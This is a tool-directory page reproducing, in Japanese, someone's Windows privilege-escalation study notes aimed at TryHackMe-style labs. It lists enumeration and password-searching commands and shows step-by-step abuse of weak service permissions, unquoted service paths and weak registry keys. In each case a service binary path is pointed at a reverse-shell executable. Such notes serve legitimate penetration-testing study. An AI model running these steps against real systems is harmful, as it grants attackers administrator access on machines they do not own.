Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Windows-Privilege-Escalation-Notes — Windowsの権限昇格の概念に関する私のハンドブック。私のプレイリストもチェックしてください。リンク: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk | Kitploit
ツール/GitHubGitHub/saisathvik1/windows-privilege-escalation-notes
特権昇格パスワード攻撃エクスプロイト情報収集ポストエクスプロイトCTFペネトレーションテスト学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
saisathvik1/windows-privilege-escalation-notes

Windows-Privilege-Escalation-Notes

Windowsの権限昇格の概念に関する私のハンドブック。私のプレイリストもチェックしてください。リンク: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk

リポジトリを見る
5914334年前Kitploit レビュー済み

Windows 権限昇格

  • 推奨ルームは https://tryhackme.com/room/windows10privesc ですが、任意のものを使用しても構いません。
  • 参考リソース:
    • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    • https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
    • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
    • https://www.fuzzysecurity.com/tutorials/16.html

Windowsマシンにおけるアカウントの種類:

  • Administrator (ローカル): 最も多くの権限を持つユーザーです。
  • Standard (ローカル): これらのユーザーはコンピューターにアクセスできますが、実行できるタスクは限られています。通常、これらのユーザーはシステムに恒久的または重要な変更を加えることはできません。
  • Guest: このアカウントはシステムへのアクセスを提供しますが、ユーザーとして定義されていません。
  • Standard (ドメイン): Active Directory により、組織はユーザーアカウントを管理できます。標準のドメインアカウントはローカル管理者権限を持つ場合があります。
  • Administrator (ドメイン): 最も特権を持つユーザーと見なされます。組織のドメイン全体で他のユーザーを編集、作成、削除できます。
  • SYSTEM : これは特にアカウントというわけではありませんが、Windows サービスがタスクを実行するために使用するアカウントです。ただし、このアカウントもより高い権限を持っています。

重要な注意点はグループです。Administrator グループの任意のユーザーが権限昇格に役立ちます!


情報収集:

  • 最高のリソースの1つ: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
  1. whoami /priv - 現在のユーザーの権限
  2. net users - すべてのユーザーを一覧表示
  3. net user <username> - 特定のユーザーの詳細を一覧表示
  4. qwinsta - 同時にログインしている他のユーザー
  5. net localgroup - システムで利用可能なグループ
  6. net localgroup <group-name> - 特定のグループのメンバーを一覧表示
  7. systeminfo - OSに関するすべての情報を提供
  8. hostname - システムのホスト名
  9. findstr /si password *.txt - 「password」を含むファイルをテキストファイルの中から探しています
  10. wmic qfe get Caption,Description,HotFixID,InstalledOn - セキュリティパッチと関連情報を表示します
  11. netstat -ano - マシンに関連する接続
  12. schtasks /query /fo LIST /v - スケジュールされたタスクを確認する
  13. driverquery - ドライバー関連情報を一覧表示
  14. sc query windefend - アンチウイルスサービスを探す

Windows Exploit Suggester:

  • これは多くの人が使用する伝説的なツールです
  • このツールを使えば、インターネット上にあるボックスの60%を解決できます
  • リンク: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • 自分のマシンに systeminfo ツールの出力のコピーを用意するだけで、これがこのツールの唯一の要件です
  • プロのヒント: すべての依存関係が満たされていることを確認してください!

脆弱なソフトウェア:

  • ここでは、インストールされているソフトウェアのバージョンを見つけ、それが脆弱かどうかを調べます
  • wmic product get name,version,vendor - 製品名、バージョン、ベンダーを提供します。この特定のコマンドは、必要なものを適切に視覚化してくれます。
  • 上記のコマンドが機能しない場合があるため、wmic service list brief | findstr "Running" を使用し、サービスに関する詳細情報を取得するには sc qc <ServiceName> を使用してください。


Metasploit による権限昇格:

  • metasploit でセッションを取得した後、post/multi/recon/local_exploit_suggester というモジュールを実行します。このツールが正しく動作するように、セッションをバックグラウンドに置くことを確認してください。または、meterpreter から単にロードすることもできます。
  • その後、悪用可能なモジュールが提案されるので、それらを試してください。一部は動作するかもしれません(任意)。


WinPEAS:

  • これは非常に役立つ自動列挙スクリプトです。
  • 最適に使用するには、winpeas.exe --help を実行してすべてのオプションを確認してください。
  • 必要なオプションのみを実行し、出力を調整してください。


カーネルエクスプロイト:

  • Windows Exploit Suggester という特定のツールを使用します
  • まず、systeminfo コマンドを実行してシステム情報を取得し、それを任意のファイルにコピーして拡張子 .txt を付けて名前を付けます
  • 次に、データベースを使用してツールを実行します
  • ここでは、カーネル関連のエクスプロイトを探します。
  • 楽しいハッキングを!!


サービスエクスプロイト:

安全でないサービス権限:

  • ここでは、安全でない権限を持つサービスを特定し、それらを悪用してみます。

  • ここでは winpeas.exe servicesinfo コマンドを利用でき、非常に役立つサービスを確認できます。

  • 出力の興味深い部分は次のようなものです。```

    daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig

- しかし、より詳細な情報を得るために、Microsoft製の**accesschk**というツールを使用できます。次のように実行します `accesschk.exe /accepteula -uwcqv <current-user> <service>`、出力は次のとおりです。```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

  • しかし、主要な部分は service_change_config で、サービスの構成を変更できます。
  • sc qc <service> を実行し、変更対象となる Binary_path_name(binpath とも呼ばれる)をメモします(悪い笑み)。
  • 次に、シェルタイプのペイロードを作成し、ターゲットマシンに転送します。
  • 構成を変更するための構文は、sc config <service> <option>="<value>" です。
  • 次に sc config daclsvc binpath="<path>" を実行し、サービス sc start daclsvc を開始します。

引用符なしサービスパス:(USP)

  • サービスの場合、パスは引用符で囲む必要があります。もしそのように囲まれていない場合、その抜け穴を悪用して高い特権を取得できます。``` Vulnerability Insight: The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks. If, for example, a service uses the unquoted path:

Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe

The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.

C:\Program.exe C:\Program Files\Ignite.exe C:\Program Files\Ignite Data\Vuln.exe C:\Program Files\Ignite Data\Vuln Service\file.exe

- 詳細情報を取得するには、**WinPEAS** スクリプトを `servicesinfo` オプション付きで使用するだけです。ここでは、**Unquoted Service Path** を悪用できるかどうかの情報を確認できます。ツールを実行したところ、出力の興味深い部分は次のようになります、```
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected  
  • ここでの出力は、**No quotes and Space Detected(引用符なし・スペース検出)**を明確に示しているため、USP を使用してこの特定のサービスを悪用できると結論付けられます。
  • また、サービスに関する詳細情報を収集するには sc qc <service> を使用します。
  • 次に、accesschk を使用して、この特定の場所 C:\Program Files\Unquoted Path Service の権限を確認しましょう。accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" を実行します。出力:``` accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" C:\Program Files\Unquoted Path Service Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators
- 読み取りと書き込みの権限があります。
- 次に、ペイロードを作成して `C:\Program Files\Unquoted Path Service` に配置します。`copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"` を使用します。ここでは、アルファベット順でも有利になるように、別の名前を使用しています。
- 次にサービスを開始します。`sc start unquotedsvc` を実行すると、管理者になります!!!

-----------------------
### 弱いレジストリ権限:
- ここでは、レジストリ権限が弱いサービスを悪用してみます。
- これらを探すには、`servicesinfo` オプションを指定した `Winpeas` を使用する必要があります。出力は次のようになります。```
����������͹ Looking if you can modify any service registry
� Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions                                                                                          
    HKLM\system\currentcontrolset\services\regsvc (Interactive [FullControl])

次にサービスの名前はregsvcです。このサービスについて深く掘り下げましょう。sc qc regsvcを実行すると、出力は次のとおりです。``` sc qc regsvc [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Insecure Registry Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

- ちょっとした面白い事実として、パスが引用符で囲まれているため、**Unquoted Service Path**には該当しません。
- 次に、`accesschk.exe` を実行して深く掘り下げましょう。`accesschk /acceptula -uvwqk <path of registry>` を実行します(これは `HKLM\system\currentcontrolset\services\regsvc` です)。
- 出力内で `RW NT AUTHORITY\INTERACTIVE(KEY_ALL_ACCESS)` を探します。これが見つかれば、悪用する準備は完了です。
- 次に、`reg query HKLM\system\currentcontrolset\services\regsvc` を使用してレジストリ内のオプションを確認しましょう。`ImagePath` というオプションが見つかりました。これは実行可能ファイルの値を取るため、これを悪用しましょう。まず、リバースシェルを作成します。
- 次に、`reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f` を実行します。ペイロードのパスは要件に応じて選択してください。
- サービスを実行します。`net start regsvc` を実行すると、やった! シェルを取得できました。
ツールをダウンロード